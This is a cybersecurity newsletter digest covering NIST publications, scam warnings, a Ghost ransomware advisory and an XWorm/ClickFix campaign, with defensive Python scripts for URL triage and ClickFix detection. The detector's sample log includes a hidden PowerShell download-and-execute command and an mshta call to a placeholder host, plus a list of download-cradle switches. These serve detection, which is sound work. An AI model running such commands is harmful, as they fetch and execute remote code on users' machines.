NIST CSF 2.0 Profile for Semiconductor Manufacturing

The NIST National Cybersecurity Center of Excellence (NCCoE), along with the SEMI Semiconductor Manufacturing Cybersecurity Consortium, has released Draft NIST Internal Report (NIST IR) 8546, Cybersecurity Framework (CSF) 2.0 Semiconductor Manufacturing Community Profile for public comment until 11:59 PM ET on Monday, April 14, 2025.

About the Draft

Draft NIST Internal Report (IR) 8546, Cybersecurity Framework 2.0 Semiconductor Manufacturing Community Profile, provides a voluntary, risk-based approach for managing cybersecurity activities and reducing cybersecurity risk to semiconductor manufacturing. The semiconductor manufacturing environment is a complex ecosystem of device makers, equipment OEMs, suppliers and solution providers. This Profile focuses on desired cybersecurity outcomes and can be used as a guideline to improve the current cybersecurity posture of the semiconductor manufacturing ecosystem.

“NIST, in collaboration with industry leaders and government agencies, has developed and is releasing a comprehensive Framework designed to safeguard semiconductor manufacturing from emerging threats and vulnerabilities,” said Sanjay Rekhi, group leader of the Security Components and Mechanisms Group at NIST. “This initiative is part of a broader, multi-year effort to strengthen the security of critical infrastructure, with a particular focus on the security of semiconductors and their supply chain.”

Comment Now!

NCCoE Cybersecurity and AI Workshop

Event Date: April 3, 2025

Event Time: 9:00 AM – 5:00 PM EST 

Event Location: Virtual and at the National Cybersecurity Center of Excellence (NCCoE)

Recent advancements in Artificial Intelligence (AI) technology bring great opportunities and challenges to organizations, including how AI can affect their cybersecurity capabilities and risks. The potential positive and negative impacts of AI need to be understood and managed.

NIST is proposing the creation of a NIST Cybersecurity Framework (CSF) Profile (Cyber AI Profile), in collaboration with the cybersecurity and AI communities, to focus on three sources of risk that impact an organization’s operational risk: Cybersecurity of AI Systems, AI-enabled Cyber Attacks, and AI-enabled Cyber Defense. 

To inform these discussions, join our upcoming workshop where we will explore ideas discussed in the newly released Cybersecurity and AI Workshop Concept Paper* through a variety of hybrid presentations and panel discussions and in-person only working sessions.

Registration for in-person attendance closes on March 27, 2025. 

Due to space limitations, registration is limited to the first 150 registrants on a first-come, first-served basis.

There is no registration needed to attend virtually. Please see the link to the event page and watch the stream on April 3, 2025: https://www.nccoe.nist.gov/get-involved/attend-events/cyber-and-ai-workshop

We look forward to your participation at this event.

*Please provide any feedback using the form found on our project page before 11:59 p.m. EDT on Friday, March 14, 2025, to inform workshop topics. 

Register Now!

Microsoft Security Public Webinars

February 12 – Microsoft Defender XDR: How to Get the Most Out of Microsoft Defender for Vulnerability Management (MDVM)

February 18 – Setting up Microsoft Entra Verified ID, step by step.

February 18 – Microsoft Defender XDR AMA – Automatic Attack Disruption

February 19 – Security Copilot in Entra: Addressing App Risks and High-Privilege Permissions

February 19 – Microsoft Sentinel: Microsoft Sentinel Repositories: Manage Your SIEM Content Like a Pro

February 25 – Microsoft Defender XDR: Learn About Insider Risk Management Data in Microsoft Defender XDR

February 26 – Azure Network Security: Updating Your Azure Web Application Firewall Ruleset: Common Pitfalls and How to Avoid Them

February 26 – 425 Show: Security Copilot in Microsoft Entra

February 26 – Empower Admins to Protect their Environment Quickly with Risk Policy Impact Analysis

February 27 – Microsoft Entra Suite scenario deep dive: Onboard employees easily with Microsoft Entra Suite

February 27 – Microsoft Defender XDR: Licensing and Site Security in XDR

March 05 – Microsoft Defender for Cloud: API Security Posture with Defender for Cloud

March 06 – Microsoft Entra Suite scenario deep dive: Goodbye, legacy VPNs; hello, secure access to on-premises resources

March 06 – Azure Network Security: Implementing Multi-Layered Security with Azure DDoS Protection and Azure WAF

Register now

Valentine’s Day Scams Attempt to Steal More Than Hearts

As Valentine’s Day approaches, users will likely shop online, send and receive messages and e-cards, and use online dating platforms. However, threat actors capitalize on the season of love, tugging at users’ heartstrings and attempting to steal more than their hearts. They impersonate known and trusted organizations, major brands, contacts such as friends and family, and potential love interests in an attempt to steal personal data, financial information, account credentials, and funds.

In the past, threat actors exploited known vulnerabilities in websites’ digital commerce platforms, such as Magento, WooCommerce, WordPress, and Shopify, or in vulnerable third-party services used by the website. Through web skimming campaigns, they targeted online retailers and shoppers to steal PII and credit card information from e-commerce websites. In a recent campaign, researchers identified a Google Tag Manager skimmer stealing credit card information from a Magento website. This campaign highlights the prevalent use of legitimate platforms to obfuscate and deploy malicious code.

Threat actors have registered legitimate domains to use as bait in Valentine’s Day-themed phishing campaigns. These domains contain keywords such as “valentine,” “love,” “gifts,” or “flowers.” The phishing emails may spoof known and trusted contacts or organizations and carry themes of love, gifts, and romance, including offers too good to be true and Valentine’s Day sales or discounts. Unsuspecting victims may encounter more than a romantic surprise as threat actors use social engineering to lure them into clicking malicious links, divulging sensitive data, or making fraudulent purchases.

Threat actors also engage in romance scams by creating fake profiles on online dating platforms and posing as potential love interests, quickly building trust with their target to establish a relationship. In a recently reported romance scam, the threat actor built enough trust that the target revealed they were going through a divorce and having financial issues. The threat actor then sent purported video footage of a mailed package containing items and thousands of dollars in cash, claiming their military ID would be held until the package was released. Later, they informed the target that the package was supposedly stuck at the airport and demanded a fee via PayPal, CashApp, or Zelle.

Additionally, the NJCCIC continues to receive reports of sextortion incidents in which victims are threatened with the release of supposed compromising or sexually explicit photos or videos if they do not pay an extortion demand. Some sextortion threats are not credible, as the threat actors are unable to provide proof that such photos or videos exist.

Uptick in Vishing Scams

The NJCCIC observed an uptick in vishing scams, a form of phishing conducted over the phone. In these calls, threat actors attempt to gain trust and legitimacy by sharing some of the recipient’s personal data, such as name, age, and address. However, this data is typically an aggregated set of publicly available information found online. Some of it may be outdated or pertain to a partner rather than the call recipient. The phone numbers used in vishing scams vary and change frequently, and threat actors often spoof official phone numbers to appear legitimate. Vishing calls may be persistent, and threat actors may contact potential victims multiple times daily.

Threat actors claim authority or legitimacy by impersonating various government agencies, financial institutions, organizations, and individuals to convince the call recipient to provide additional sensitive information, such as personally identifiable information (PII), financial information, or account credentials. They also convey urgency to extort money, persuading the call recipient to purchase fraudulent goods or services or to grant access to their accounts or devices. The additional information and this fraudulent activity can facilitate further cyberattacks.

In some instances, threat actors personally harass or threaten the call recipient or their known contacts. For example, a threat actor claimed the call recipient was responsible for a supposed accident and threatened them if they did not pay a hospital bill. In another example, the call recipient heard a woman crying in the background while a Spanish-speaking male claimed to be part of a cartel and demanded a $20,000 payment from the call recipient to keep the woman alive.

Additionally, a threat actor spoofed the phone number of the call recipient’s mother and demanded payment upon answering. If the call recipient did not pay, the threat actor claimed they would kill the person they were supposedly holding at gunpoint. The call recipient heard crying in the background, disconnected the call, and contacted their mother on another line, confirming it was a scam. The call recipient’s sister also received a similar call spoofing their mother.

Furthermore, voice cloning technologies and artificial intelligence (AI) manipulations can be used in impersonation and extortion scams. Threat actors find and capture snippets of a person’s voice online, through social media platforms, in outgoing voicemail messages, or when the recipient answers a call. They can weaponize AI technology with the captured audio to clone a person’s voice and create fraudulent schemes, including family emergencies, kidnappings, robberies, or car accidents.

Security and Trust Considerations for Digital Twin Technology | NIST Releases IR 8356 

NIST has published Internal Report (IR) 8356, Security and Trust Considerations for Digital Twin Technology. This publication introduces the concept of a digital twin (DT), which is an electronic representation of a real-world physical (e.g., buildings, electronics, living things) or non-physical (e.g., processes, conceptual models) entity. DTs utilize existing technologies to enable a broad range of capabilities that require interoperable definitions, tools, and standards.

This document discusses key components, functions, existing modeling and simulation, and cybersecurity and trust considerations for DTs. It also provides simple examples of how to apply DT technology to real-world problems and casts a broader vision for future capabilities.

Read More

NIST Releases IR 8532, Workshop Report on Enhancing Security of Devices and Components Across the Supply Chain

NIST has released Internal Report (IR) 8532, Workshop Report on Enhancing Security of Devices and Components Across the Supply Chain, which summarizes the presentations and discussions from a recent workshop on semiconductor security. The hybrid workshop brought together experts from industry, government, and academia to explore priorities in addressing current and emerging cybersecurity threats to semiconductors.

Experts at the event provided valuable input on NIST’s efforts in developing cybersecurity and supply chain standards, guidance, and best practices. Key topics related to semiconductor development included cybersecurity measures and metrics that leverage reference data sets for the testing, attestation, certification, verification, and validation of semiconductor components across the supply chain. The workshop also highlighted the importance of automated cybersecurity tools and techniques for securing manufacturing environments throughout the development life cycle.

Read More

#StopRansomware: Ghost (Cring) Ransomware

This Joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) released this Joint Cybersecurity Advisory to disseminate known Ghost (Cring) (“Ghost”) ransomware IOCs and TTPs identified through FBI investigation as recently as January.

Beginning in early 2021, Ghost actors began attacking victims whose internet-facing services ran outdated versions of software and firmware. This indiscriminate targeting of networks containing vulnerabilities has led to the compromise of organizations across more than 70 countries, including organizations in China. Ghost actors, located in China, conduct these widespread attacks for financial gain. Affected victims include critical infrastructure, schools and universities, healthcare, government networks, religious institutions, technology and manufacturing companies, and numerous small- and medium-sized businesses.

Ghost actors rotate their ransomware executable payloads, switch file extensions for encrypted files, modify ransom note text, and use numerous ransom email addresses, which has led to variable attribution of this group over time. Names associated with this group include Ghost, Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture. Samples of ransomware files Ghost used during attacks are Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe.

Ghost actors use publicly available code to exploit Common Vulnerabilities and Exposures (CVEs) and gain access to internet-facing servers. Ghost actors exploit well-known vulnerabilities and target networks where available patches have not been applied.

FBI, CISA, and MS-ISAC encourage organizations to implement the recommendations in the mitigations section of this advisory to reduce the likelihood and impact of Ghost ransomware incidents.

Open for Public Comment | NIST Publication on Testable Controls and Security Capabilities for Continuous Monitoring (Vol. 1)

The NIST Risk Management Framework (RMF) Team has released the initial public draft (ipd) of NIST Interagency Report (IR) 8011v1r1 (Volume 1, Revision 1), Testable Controls and Security Capabilities for Continuous Monitoring: Volume 1 — Overview and Methodology. This represents a major revision of the first and key volume in the multi-volume series.

IR 8011 provides a methodology for identifying testable controls from the Special Publication (SP) 800-53 control catalog that share common defense objectives in support of information security continuous monitoring. Volume 1 introduces key terminology and foundational concepts, describes the methodology, discusses conceptual operational considerations for a potential IR 8011 implementation, and identifies sample automatable control tests.

The public comment period is open through Friday, April 4, 2025. See the publication details for a copy of the draft and instructions for submitting comments. 

Read More

XWorm Malware Quickly Slithers in Multiple Campaigns

First discovered in 2022, XWorm malware is a remote access trojan (RAT) capable of evading detection and collecting sensitive information, including financial details, browsing history, saved passwords, and cryptocurrency wallet data.

XWorm tracks keystrokes, captures webcam images, listens to audio input, scans network connections, and views open windows. It can also read and manipulate a computer’s clipboard, potentially stealing cryptocurrency wallet credentials. Last year, XWorm was involved in many cyberattacks, including the abuse of Cloudflare tunnels and delivery via a Windows script file, and the upward trend in these sophisticated RATs is already evident in 2025.

Last month, researchers discovered that threat actors had targeted script kiddies with a trojanized version of the XWorm RAT builder. The weaponized malware propagated through GitHub, Telegram, and file-sharing platforms to infect over 18,000 devices globally, including in the United States.

The malware secretly compromised computers to deploy a backdoor that performs system reconnaissance, command execution, and data exfiltration, including browser credentials, Discord tokens, Telegram data, and system information. Threat actors have exfiltrated over 1 GB of browser credentials from multiple computers. The malware’s “kill switch” feature was identified and leveraged to disrupt operations on infected computers.

In the past month, the NJCCIC’s email security solution identified an uptick in multiple campaigns attempting to deliver XWorm malware to New Jersey State employees to gain remote access, steal credentials, exfiltrate data, and deploy ransomware.

The messages impersonate Booking.com or a customer of a hospitality organization with themes of last-minute bookings to address customer complaints, inquiries about upcoming travel plans, or issues related to past travel reservations. They display subject lines containing keywords such as reservation, booking cancellation, request for action, poor evaluation, hotel accommodation, and establishment difficulty.  

The messages contain various types of URLs, such as email trackers, URL shorteners, and open redirects. There are multiple redirects and filtering techniques before arriving at one of the numerous landing pages with various layouts and scripting. The URLs for the landing pages contain keywords such as book, booking, complaint, feedback, inquiry, reportguest, and stayissueguest.
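The redirect chains and landing-page keywords described here can be triaged automatically before an analyst opens anything. The following Python script is an added example for this newsletter item (it is not NJCCIC tooling or code from any vendor): it unwraps URLs nested inside open-redirect query parameters, flags a few public URL shorteners, and scores the final landing page for the seasonal domain keywords listed in the Valentine’s Day item above and the landing-page keywords listed in this item. The shortener list, the scoring weights, and the sample URLs are constructed assumptions, not indicators taken from the campaign.

```python
"""Triage of links found in a suspected phishing message.

Added example for this newsletter item; not NJCCIC tooling or vendor code.
It unwraps URLs nested inside open-redirect query parameters, flags a few
public URL shorteners, and scores the final landing page for the lure
keywords named in the text. Lists, weights and sample URLs are constructed
assumptions, not indicators taken from the campaign.
"""
from urllib.parse import parse_qs, urlparse

# Assumption: a short illustrative list of public URL shorteners.
SHORTENER_HOSTS = {"bit.ly", "tinyurl.com", "t.co", "goo.gl"}

# Keywords the text reports in Valentine's Day phishing domains ...
SEASONAL_KEYWORDS = ("valentine", "love", "gifts", "flowers")
# ... and in the XWorm campaign's landing-page URLs.
LANDING_KEYWORDS = ("book", "booking", "complaint", "feedback",
                    "inquiry", "reportguest", "stayissueguest")


def unwrap_redirects(url, max_depth=5):
    """Follow open-redirect style nesting offline: if any query parameter of the
    current URL is itself an http(s) URL, treat it as the next hop.
    Returns the chain outermost-first. Nested URLs are assumed to be
    percent-encoded, as parse_qs decodes exactly one level per hop."""
    chain = [url]
    for _ in range(max_depth):
        params = parse_qs(urlparse(chain[-1]).query)
        nested = next((v for values in params.values() for v in values
                       if v.lower().startswith(("http://", "https://"))), None)
        if nested is None:
            break
        chain.append(nested)
    return chain


def host_of(url):
    return (urlparse(url).hostname or "").lower()


def triage_url(url):
    """Score one URL; a higher score means it deserves a closer look."""
    chain = unwrap_redirects(url)
    final = urlparse(chain[-1])
    host = (final.hostname or "").lower()
    path = final.path.lower()
    seasonal_hits = [k for k in SEASONAL_KEYWORDS if k in host]
    # Substring match on purpose: "book" also fires on "booking", acceptable for triage.
    landing_hits = [k for k in LANDING_KEYWORDS if k in host or k in path]
    shorteners = [host_of(u) for u in chain if host_of(u) in SHORTENER_HOSTS]
    # Weights are assumptions: every hop and every shortener counts double.
    score = (2 * (len(chain) - 1) + 2 * len(shorteners)
             + len(seasonal_hits) + len(landing_hits))
    return {"chain": chain, "final_host": host, "seasonal_keywords": seasonal_hits,
            "landing_keywords": landing_hits, "shorteners": shorteners, "score": score}


# Constructed sample: tracker -> open redirect -> landing page, each hop encoded once more.
SAMPLE_URLS = [
    "https://mail-track.example/c?id=42&u=https%3A%2F%2Fredirect.example%2Fout%3Fnext%3D"
    "https%253A%252F%252Fhotel-reportguest.example%252Fbooking%252Fcomplaint",
    "https://valentine-flowers-gifts.example/sale",
    "https://bit.ly/abc123",
    "https://www.example.com/",
]

if __name__ == "__main__":
    for u in SAMPLE_URLS:
        r = triage_url(u)
        print(r["score"], r["final_host"], " -> ".join(r["chain"]))
```

The unwrapping is done purely on the string, so the script never contacts the tracker, the redirector, or the landing page; a shortener therefore ends the chain and is scored as a hop that could not be resolved offline.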

The threat actors use the ClickFix technique, displaying dialog boxes with fake error messages to manipulate targets into following instructions to “fix” the problem. Sometimes they lend the lure an air of authenticity with a fake CAPTCHA-themed ClickFix page that purports to validate the target. In either case, the target’s click causes malicious payloads or scripts to be copied, pasted, or executed in the background. The payloads use PowerShell or MSHTA commands to download and execute XWorm malware.
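On the endpoint, the download-and-execute stage described here (PowerShell or MSHTA launched after the user pastes a command) shows up in process-creation telemetry, which is where a defender can catch it even when the email filter misses the lure. The following Python script is an added example for this item, not NJCCIC tooling or vendor code: it scores constructed Sysmon-style JSON events for a stage binary launched from an interactive user shell with a URL or typical download-cradle switches on its command line. The field names (ProcessId, ParentImage, Image, CommandLine), the parent-process list, the switch list, and the alert threshold are assumptions; the sample command lines point at the reserved .invalid domain.

```python
"""Flagging ClickFix-style execution in process-creation telemetry.

Added example for this newsletter item; not NJCCIC tooling or vendor code.
Events are constructed JSON lines shaped like Sysmon Event ID 1 / EDR process
events; the field names (ProcessId, ParentImage, Image, CommandLine), the
parent list, the switch list and the alert threshold are assumptions.
"""
import json
import re

# The download-and-execute binaries named in the text.
STAGE_BINARIES = {"mshta.exe", "powershell.exe", "pwsh.exe"}
# Interactive parents from which a command pasted by the user is launched (assumption).
USER_SHELL_PARENTS = {"explorer.exe", "cmd.exe"}

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Common download-cradle and evasion switches, matched case-insensitively.
CRADLE_RE = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|\birm\b|"
    r"invoke-expression|\biex\b|-enc(?:odedcommand)?\b|-w(?:indowstyle)?\s+hidden|"
    r"-nop\b|-noprofile\b|\bbypass\b)",
    re.IGNORECASE,
)


def basename(path):
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return (score, reasons) for one process-creation event dict.
    Score is the number of independent signals; a non-stage binary scores 0."""
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    if image not in STAGE_BINARIES:
        return 0, []
    reasons = [f"stage binary {image}"]
    if parent in USER_SHELL_PARENTS:
        reasons.append(f"launched from user shell {parent}")
    if URL_RE.search(cmd):
        reasons.append("url on command line")
    hits = sorted({m.group(0).lower() for m in CRADLE_RE.finditer(cmd)})
    if hits:
        reasons.append("cradle switches: " + ", ".join(hits))
    return len(reasons), reasons


def detect(lines, threshold=3):
    """Parse JSON lines and return alerts for events scoring at or above threshold."""
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        ev = json.loads(line)
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append({"pid": ev.get("ProcessId"), "score": score, "reasons": reasons})
    return alerts


# Constructed sample log: two ClickFix-like launches, one legitimate admin script, one benign app.
SAMPLE_LOG = [json.dumps(e) for e in [
    {"ProcessId": 4120, "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\mshta.exe",
     "CommandLine": "mshta https://example.invalid/verify"},
    {"ProcessId": 4188, "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -w hidden -nop -c iex (New-Object Net.WebClient)"
                    ".DownloadString('https://example.invalid/s')"},
    {"ProcessId": 5012, "ParentImage": "C:\\Windows\\System32\\svchost.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -ExecutionPolicy RemoteSigned -File C:\\Scripts\\inventory.ps1"},
    {"ProcessId": 5200, "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad"},
]]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The threshold of three is deliberately above what a scheduled administrative PowerShell script produces (stage binary only), so the rule fires on the combination of signals rather than on any single one; tune the parent list and switch list to the environment before deploying.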

Recommendations

Refrain from responding to unsolicited communications, clicking links, or opening attachments from unknown senders.

Exercise caution with communications from known senders. Confirm requests from senders via contact information obtained from verified and official sources.

Type official website URLs into browsers manually and only submit account credentials or sensitive information on official websites.

Use strong, unique passwords for all accounts and enable multi-factor authentication (MFA) where available, choosing authentication apps or hardware tokens over SMS text-based codes.

Reduce your digital footprint so threat actors cannot easily target you. Keep systems up to date and apply patches after appropriate testing.